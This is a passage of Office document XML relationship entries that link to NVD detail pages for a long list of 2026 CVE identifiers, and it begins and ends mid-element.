Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81952" TargetMode="External" Id="rId251" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81955" TargetMode="External" Id="rId252" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81996" TargetMode="External" Id="rId253" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82536" TargetMode="External" Id="rId254" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83941" TargetMode="External" Id="rId255" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83992" TargetMode="External" Id="rId256" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83996" TargetMode="External" Id="rId257" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83998" TargetMode="External" Id="rId258" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85877" TargetMode="External" Id="rId259" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86076" TargetMode="External" Id="rId260" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86083" TargetMode="External" Id="rId261" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86730" TargetMode="External" Id="rId262" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12611" TargetMode="External" Id="rId263" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33197" TargetMode="External" Id="rId264" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55250" TargetMode="External" Id="rId265" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62648" TargetMode="External" Id="rId266" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62649" TargetMode="External" Id="rId267" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62650" TargetMode="External" Id="rId268" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73314" TargetMode="External" Id="rId269" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73316" TargetMode="External" Id="rId270" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77111" TargetMode="External" Id="rId271" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId272" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82064" TargetMode="External" Id="rId273" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82075" TargetMode="External" Id="rId274" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86727" TargetMode="External" Id="rId275" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86732" TargetMode="External" Id="rId276" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86738" TargetMode="External" Id="rId277" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34223" TargetMode="External" Id="rId278" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61517" TargetMode="External" Id="rId279" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74239" TargetMode="External" Id="rId280" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75990" TargetMode="External" Id="rId281" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75991" TargetMode="External" Id="rId282" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76190" TargetMode="External" Id="rId283" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76199" TargetMode="External" Id="rId284" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77109" TargetMode="External" Id="rId285" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77774" TargetMode="External" Id="rId286" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79721" TargetMode="External" Id="rId287" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80097" TargetMode="External" Id="rId288" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86509" TargetMode="External" Id="rId289" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86510" TargetMode="External" Id="rId290" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86712" TargetMode="External" Id="rId291" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86722" TargetMode="External" Id="rId292" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58113" TargetMode="External" Id="rId293" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67378" TargetMode="External" Id="rId294" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67379" TargetMode="External" Id="rId295" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67636" TargetMode="External" Id="rId296" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74860" TargetMode="External" Id="rId297" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75993" TargetMode="External" Id="rId298" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76958" TargetMode="External" Id="rId299" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85384" TargetMode="External" Id="rId300" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69479" TargetMode="External" Id="rId301" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69638" TargetMode="External" Id="rId302" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75999" TargetMode="External" Id="rId303" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77827" TargetMode="External" Id="rId304" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86819" TargetMode="External" Id="rId305" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19203" TargetMode="External" Id="rId306" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69646" TargetMode="External" Id="rId307" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81821" TargetMode="External" Id="rId308" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81822" TargetMode="External" Id="rId309" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69846" TargetMode="External" Id="rId310" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69906" TargetMode="External" Id="rId311" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72958" TargetMode="External" Id="rId312" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72961" TargetMode="External" Id="rId313" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72962" TargetMode="External" Id="rId314" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76191" TargetMode="External" Id="rId315" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76202" TargetMode="External" Id="rId316" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77097" TargetMode="External" Id="rId317" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77968" TargetMode="External" Id="rId318" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81354" TargetMode="External" Id="rId319" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81356" TargetMode="External" Id="rId320" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81357" TargetMode="External" Id="rId321" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81378" TargetMode="External" Id="rId322" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81379" TargetMode="External" Id="rId323" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83939" TargetMode="External" Id="rId324" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86600" TargetMode="External" Id="rId325" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47297" TargetMode="External" Id="rId326" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55007" TargetMode="External" Id="rId327" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69325" TargetMode="External" Id="rId328" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69380" TargetMode="External" Id="rId329" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69438" TargetMode="External" Id="rId330" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId417" /><Relationship 